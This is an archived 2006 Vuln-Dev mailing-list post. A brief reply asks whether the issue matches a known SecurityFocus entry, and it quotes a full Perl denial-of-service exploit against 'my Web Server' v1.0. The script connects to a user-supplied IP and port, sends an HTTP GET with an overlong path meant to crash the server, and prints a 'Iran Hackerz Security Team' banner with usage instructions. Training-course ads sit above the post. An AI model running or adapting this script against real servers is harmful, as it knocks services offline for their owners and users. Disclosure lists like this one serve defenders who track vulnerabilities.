Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]

Re: my Web Server << v-1.0 Denial of Service Exploit

Subject: Re: my Web Server << v-1.0 Denial of Service Exploit
Date: Fri, 26 May 2006 14:09:31 -0500
Is this the same vulnerability?
http://www.securityfocus.com/bid/5954

On 25 May 2006 13:35:13 -0000, s3rv3r_hack3r@yahoo.com
<s3rv3r_hack3r@yahoo.com> wrote:
#!/usr/bin/perl

#my Web Server << v-1.0 Denial of Service Exploit

#vendor : Eitsop.s5.com

use IO::Socket;

use strict;


my($socket) = "";



if($socket = IO::Socket::INET->new(

                PeerAddr => $ARGV[0],

                PeerPort => $ARGV[1],

                Proto => "TCP"))

{

        print "++++++++++++++++++++++++++++++\n";

        print "Connecting to $ARGV[0]:$ARGV[1] ...\n";

        print "++++++++++++++++++++++++++++++\n";

        print "Exploit Send successfuly!!\n";

        print "++++++++++++++++++++++++++++++\n";

        print $socket "GET 
/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
 HTTP/1.0\r\n\r\n";

        close($socket);

}

else

{

        print "++++++++++++++++++++++++++++++++++++++++++++++++++++\n";

        print "  ___ ___                __                         \n";

        print " /   |   \_____    ____ |  | __ ___________________ \n";

        print "/    ~    \__  \ _/ ___\|  |/ // __ \_  __ \___   / \n";

        print "\    Y    // __ \\  \___|    <\  ___/|  | \//    /  \n";

        print " \___|_  /(____  )\___  >__|_ \\___  >__|  /_____ \ \n";

        print "       \/      \/     \/     \/    \/            \/ \n";

        print "             Iran Hackerz Security Team             \n";

        print "    WebSite's: www.hackerz.ir & www.h4ckerz.com     \n";

        print "++++++++++++++++++++++++++++++++++++++++++++++++++++\n";

        print "[Usage]perl myws.pl <IP> <Port>                     \n";

        print "++++++++++++++++++++++++++++++++++++++++++++++++++++\n";

        print "[Status]Can Not Connect To >> $ARGV[0]:$ARGV[1]     \n";

        print "++++++++++++++++++++++++++++++++++++++++++++++++++++\n";

}

#EoF




<Prev in Thread] Current Thread [Next in Thread>